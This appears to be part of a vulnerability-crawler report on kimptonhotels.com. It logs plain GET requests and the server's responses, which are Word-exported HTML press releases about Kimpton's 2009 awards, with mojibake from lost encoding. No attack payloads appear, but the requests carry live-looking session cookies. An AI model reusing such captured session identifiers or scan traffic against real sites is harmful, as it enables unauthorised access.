mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.Heading1Char {mso-style-name:"Heading 1 Char"; mso-style-locked:yes; mso-style-link:"Heading 1"; mso-ansi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; mso-ansi-language:EN-US; mso-fareast-language:EN-US; font-weight:bold; mso-bidi-font-weight:normal;}span.PlainTextChar {mso-style-name:"Plain Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Plain Text"; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><bstyle='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FORIMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><br>Ilana Alperstein / 212-982-8300 x113 / <a href="mailto:ialperstein@baltzco.com">ialperstein@baltzco.com</a><o:p></o:p></span></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>stacey.ellis@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>JamieLaw / 415-955-5495 / </span><a href="mailto:jamie.law@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>jamie.law@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal align=center style='text-align:center'><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal align=center style='text-align:center'><b><spanstyle='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON RANKED #1 IN CUSTOMER SATISFACTION <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Boutique Hotel CompanySurpasses Luxury Competitors for Four Quarters<o:p></o:p></span></i></b></p><p class=MsoNormal align=center style='text-align:center'><b><spanstyle='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>SANFRANCISCO, Calif., April 5, 2010 &#8211; Kimpton Hotels &amp; Restaurants continuesto provide guests with superior care, despite the difficult travel climate, andhas garnered the top customer satisfaction score for the Upper Upscale segmentfrom the Market Metrix Hospitality Index (MMHI).&nbsp; Kimpton�s top score of 92.1percent for the fourth quarter of 2009 rounded out the company�s consistentfirst place rankings for each quarter of 2009, demonstrating its uniquecommitment to personalized service.<span style="mso-spacerun: yes">&nbsp;</span>Kimpton�s high customer satisfaction scores for all four quarters of2009 surpassed competitors across several segments, including many luxury hotelleaders.<o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>�Lastyear was a difficult year for travelers and as a hospitality company, we areproud to garner this distinction from the very people that matter most, ourguests,� said Niki Leondakis, chief operating officer, Kimpton Hotels &amp;Restaurants.&nbsp; �Ensuring travelers feel special and cared for, particularlyduring challenging times, is our first priority.� <o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>Based on35,000 in-depth customer interviews conducted each quarter by MMHI, Kimpton�s topcustomer satisfaction score reflects the company�s ongoing commitment toinnovative hospitality and personalized guest service.<spanstyle="mso-spacerun: yes">&nbsp; </span>Newly developed employee trainingcourses introduced throughout 2009 heightened attention and increased sensitivityto the changing needs of Kimpton guests in light of uncertain economic times,increased job demands, fewer resources and a tough travel environment.&nbsp; LoyalKimpton InTouch members were offered several new incentives in 2009, rangingfrom personalized promotions and exclusive deals to new ways to earncomplimentary stays at Kimpton hotels.<o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>&l..
- /pdfs/press/html/CNT-Worlds-Best-1109/index.html

/pdfs/press/html/CNT-Worlds-Best-1109/index.html

http://www.kimptonhotels.com/pdfs/press/html/CNT-Worlds-Best-1109/index.html

Request

GET /pdfs/press/html/CNT-Worlds-Best-1109/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21135
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Marliese Engel</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>0</o:TotalTime> <o:LastPrinted>2009-10-29T01:15:00Z</o:LastPrinted> <o:Created>2009-11-30T18:29:00Z</o:Created> <o:LastSaved>2009-11-30T18:29:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>598</o:Words> <o:Characters>3412</o:Characters> <o:Company>Baltz &amp; Company</o:Company> <o:Lines>28</o:Lines> <o:Paragraphs>6</o:Paragraphs> <o:CharactersWithSpaces>4190</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; mso-bidi-font-size:12.0pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Tahoma;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-title-page:yes; mso-footer:url(":images:header.htm") f1; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:1932929043; mso-list-type:hybrid; mso-list-template-ids:340533954 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span><spanstyle='font-size:11.0pt;font-family:Arial;mso-fareast-font-family:Times;mso-bidi-font-family:Arial'><span style='mso-tab-count:2'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></p><p class=MsoNormal><o:p>&nbsp;</o:p></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p></b></span></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>stacey.ellis@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>JamieLaw / 415-955-5495 / </span><a href="mailto:jamie.law@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>jamie.law@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KIMPTON HOTELS GARNER 2009 READERS� CHOICEAWARDS <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>IN <i>CON<span style='text-transform:uppercase'>d�Nast Traveler</span> </i>MAGAZINE<o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center;line-height:150%'><spanstyle='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>SAN FRANCISCO, Calif., November 30, 2009 </span><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>&#8211; <ahref="http://kimptonhotels.com/">Kimpton Hotels &amp; Restaurants</a>, acollection of boutique hotels and chef-driven restaurants, garnered two <bstyle='mso-bidi-font-weight:normal'>2009 Readers� Choice Awards<istyle='mso-bidi-font-style:normal'> </i></b>in the November 2009 issue of <istyle='mso-bidi-font-style:normal'>Cond� Nast Traveler </i>magazine.<spanstyle="mso-spacerun: yes">&nbsp; </span>Kimpton�s <ahref="http://www.burnhamhotel.com/">Hotel Burnham</a> in Chicago and <ahref="http://www.ninezero.com/">Nine Zero Hotel</a> in Boston were named amongthe �Best in the World� and featured in the �Top 100 United States Hotels�list.<span style="mso-spacerun: yes">&nbsp; </span>Scores were determined by asurvey of 25,008 travelers who called out both Kimpton hotels by awarding themthe following scores: <br style='mso-special-character:line-break'><![if !supportLineBreakNewLine]><br style='mso-special-character:line-break'><![endif]><o:p></o:p></span></p><ul style='margin-top:0in' type=disc> <li class=MsoNormal style='mso-list:l0 level1 lfo1;tab-stops:list .5in'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt; font-family:Arial;mso-bidi-font-family:Arial'>Kimpton�s Hotel Burnham </span></b><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>(Chicago, IL): 86.1 percent <b style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></li> <li class=MsoNormal style='mso-list:l0 level1 lfo1;tab-stops:list .5in'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt; font-family:Arial;mso-bidi-font-family:Arial'>Kimpton�s Nine Zero Hotel </span></b><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>(Boston, MA): 84.7 percent <b style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></li></ul><p class=MsoNormal style='line-height:150%'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>�Praise from ourguests is the highest honor we can receive,� said Niki Leondakis, chiefoperating officer, Kimpton Hotels &amp; Restaurants.<span style="mso-spacerun:yes">&nbsp; </span>�This honor is a testament to the dedication our employeeshave for creating positive and memorable travel experiences for our guests.�<o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='f..
- /pdfs/press/html/Eventi-0210/index.html

/pdfs/press/html/Eventi-0210/index.html

http://www.kimptonhotels.com/pdfs/press/html/Eventi-0210/index.html

Request

GET /pdfs/press/html/Eventi-0210/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30469
Content-Type: text/html
Cache-control: private


